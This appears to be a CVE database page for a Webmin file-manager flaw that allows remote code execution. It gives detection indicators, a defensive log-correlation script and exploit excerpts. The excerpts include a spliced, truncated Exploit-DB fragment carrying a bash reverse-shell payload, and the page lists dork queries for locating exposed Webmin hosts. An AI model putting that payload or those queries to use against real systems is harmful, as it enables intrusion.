CVE-2022-0824
Published 2022-03-02
CVE-2022-0824: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
Priority P2 · 79 · High · 8.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
Public exploit available
EPSS: 96.98% (99.9th percentile)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webmin | webmin | < 1.990 | 1.990 |
| webmin | webmin_webmin | < 1.990 (lower bound unspecified) | 1.990 |
Detection & IOCs (extracted from sources)
Detection:
- Detect POST requests from low-privilege users (or unauthenticated clients) to the File Manager download endpoint, /extensions/file-manager/http_download.cgi; the 'link' parameter is used to fetch a remote URL and stage a malicious CGI payload.
- Alert on POST requests to /extensions/file-manager/chmod.cgi setting permissions to 0755 on newly uploaded files, especially .cgi files: this is the step that makes the staged CGI executable so the web server will run it.
- Monitor for HTTP requests carrying the header 'X-Requested-With: XMLHttpRequest' combined with a POST to /extensions/file-manager/http_download.cgi, the download-trigger step of the public exploit.
- Use Shodan/FOFA/Google dork queries to identify exposed Webmin instances as potential targets: shodan 'http.title:"webmin"', FOFA 'title="webmin"', Google 'intitle:"webmin"'.
- Detect the exploit's login step by watching for a POST to /session_login.cgi with cookies 'redirect=1; testing=1; PHPSESSID=' (empty PHPSESSID), a fingerprint of the public exploit tooling.
- Flag creation or execution of .cgi files under /usr/share/webmin: the exploit uploads a reverse-shell CGI to this path and then GETs it to trigger execution.
- The Nuclei template confirms the vulnerability by detecting the error string 'Failed to write to /<path>/index.html' in the HTTP response body from the http_download.cgi endpoint: the endpoint processed the download request for a user who should not have File Manager access and only failed at the write.
Context:
- The exploit targets Webmin versions prior to 1.990; version 1.984 is explicitly confirmed vulnerable. Instances patched to 1.990 or later are not affected.
- The default upload path /usr/share/webmin applies to Debian package installations only; other installation methods may place Webmin in a different directory, which changes where the malicious CGI is staged.
- Exploitation requires valid credentials for a low-privilege authenticated user; unauthenticated exploitation is not possible with this CVE alone.
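The detection bullets above describe the exploit chain as a sequence of requests from one client: login, POST to http_download.cgi, POST to chmod.cgi, then a GET of the staged .cgi. The following script is an added example written for this page, not code from the exploit author, the Nuclei template, or the Webmin project. It correlates that chain per source IP over constructed access-log lines. It assumes (an assumption, not something the page states) that Webmin's miniserv.log uses a common-log-format layout; since request bodies are not logged, the 'link' parameter and the 0755 mode are not visible and the chain is reconstructed from methods and paths only. The KNOWN_TOP_LEVEL_CGI allowlist is hypothetical and exists so that a GET of an unexpected top-level .cgi after a chmod can be scored as the execution step.

```python
import re
from collections import defaultdict

# Constructed sample log (not real traffic). Assumption: Webmin's miniserv.log
# records requests in this CLF-like layout. Request bodies are not logged.
SAMPLE_LOG = """\
198.51.100.7 - - [02/Mar/2022:10:00:01 +0000] "POST /session_login.cgi HTTP/1.1" 302 0
198.51.100.7 - lowpriv [02/Mar/2022:10:00:02 +0000] "POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1" 200 512
198.51.100.7 - lowpriv [02/Mar/2022:10:00:03 +0000] "POST /extensions/file-manager/chmod.cgi?module=filemin HTTP/1.1" 200 128
198.51.100.7 - lowpriv [02/Mar/2022:10:00:04 +0000] "GET /revshell.cgi HTTP/1.1" 200 0
203.0.113.9 - admin [02/Mar/2022:10:05:00 +0000] "POST /session_login.cgi HTTP/1.1" 302 0
203.0.113.9 - admin [02/Mar/2022:10:05:10 +0000] "GET /filemin/index.cgi HTTP/1.1" 200 4096
192.0.2.5 - lowpriv [02/Mar/2022:10:07:00 +0000] "POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1" 200 512
192.0.2.5 - lowpriv [02/Mar/2022:10:07:01 +0000] "POST /extensions/file-manager/chmod.cgi?module=filemin HTTP/1.1" 200 128
"""

# Endpoints named in the IOC list for this CVE.
LOGIN = "/session_login.cgi"
HTTP_DOWNLOAD = "/extensions/file-manager/http_download.cgi"
CHMOD = "/extensions/file-manager/chmod.cgi"

# Hypothetical allowlist of top-level CGIs Webmin serves itself. A GET of any
# other top-level .cgi after a chmod from the same IP is scored as execution
# of the staged payload (the exploit drops it in the Webmin root directory).
KNOWN_TOP_LEVEL_CGI = {"/index.cgi", "/session_login.cgi", "/config.cgi",
                       "/switch_user.cgi", "/referer.cgi"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """Return a dict of fields for one CLF line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop ?module=filemin etc.
    return rec


def stage_of(rec, seen):
    """Map one request onto a stage of the chain, given stages already seen from its IP."""
    method, path = rec["method"], rec["path"]
    if method == "POST" and path == LOGIN:
        return "login"
    if method == "POST" and path == HTTP_DOWNLOAD:
        return "download"
    if method == "POST" and path == CHMOD:
        return "chmod"
    if (method == "GET" and path.endswith(".cgi") and "/" not in path[1:]
            and path not in KNOWN_TOP_LEVEL_CGI and "chmod" in seen):
        return "execute"
    return None


def find_chains(log_text):
    """Return one alert per source IP that reached both the download and chmod stages.

    Severity is 'high' when a matching GET of a staged .cgi was also seen,
    otherwise 'medium' (payload staged and made executable, not yet triggered).
    """
    stages = defaultdict(dict)  # ip -> {stage name: first path seen for it}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stage = stage_of(rec, stages[rec["ip"]])
        if stage and stage not in stages[rec["ip"]]:
            stages[rec["ip"]][stage] = rec["path"]
    alerts = []
    for ip, seen in stages.items():
        if "download" in seen and "chmod" in seen:
            severity = "high" if "execute" in seen else "medium"
            alerts.append({"ip": ip, "severity": severity, "stages": dict(seen)})
    return alerts


if __name__ == "__main__":
    for alert in find_chains(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['ip']}: {' -> '.join(alert['stages'])}")
```

Run against the constructed log it reports 198.51.100.7 as high (full chain ending in GET /revshell.cgi) and 192.0.2.5 as medium (download and chmod, no trigger), while the admin session browsing /filemin/index.cgi produces nothing. Legitimate File Manager users can also hit http_download.cgi and chmod.cgi, so in production the alert should be joined with the Webmin ACL (does this user have the filemin module?) or with file-creation telemetry under the Webmin root.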
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | High | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 3.0 | 8.3 | High | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L |
| NVD | 2.0 | 9.0 | High | AV:N/AC:L/Au:S/C:C/I:C/A:C |
CVSS v2 has no Critical band; NVD rates v2 scores from 7.0 to 10.0 as High, so the v2 9.0 score is High, not Critical.
No detection rules found.
Exploit-DB
Webmin 1.984 - Remote Code Execution (Authenticated)
exploitdb · 2022-03-09 · CVSS 8.8
```python
# Exploit Title: Webmin 1.984 - Remote Code Execution (Authenticated)
# Date: 2022-03-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://github.com/webmin/webmin/archive/refs/tags/1.984.zip
# Version: &S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''')
        print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC)
        f = open(f"{self.fname}", "w")
        f.write(payload)
        f.close()

    def login(self):
        login_url = self.target + "/session_login.cgi"
        cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" }
        data = { 'user' : self.username, 'pass' : self.password }
        try:
            r = self.s.post(login_url, data=data, cookies=co
```
Metasploit
Webmin File Manager RCE
metasploit module
In Webmin version 1.984, any authenticated low-privilege user without access rights to the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those functionalities in the file manager.
Nuclei
Webmin <1.990 - Improper Access Control
nuclei · CVSS 8.8
Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
```yaml
id: CVE-2022-0824
info:
  name: Webmin <1.990 - Improper Access Control
  author: cckuailong
  severity: high
  description: Webmin before 1.990 is susceptible to improper access control in GitHub repository webmin/webmin. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessar
```
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/166240/Webmin-1.984-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/169700/Webmin-1.984-File-Manager-Remote-Code-Execution.html
- https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38
- https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295
- https://notes.netbytesec.com/2022/03/webmin-broken-access-control-to-post-auth-rce.html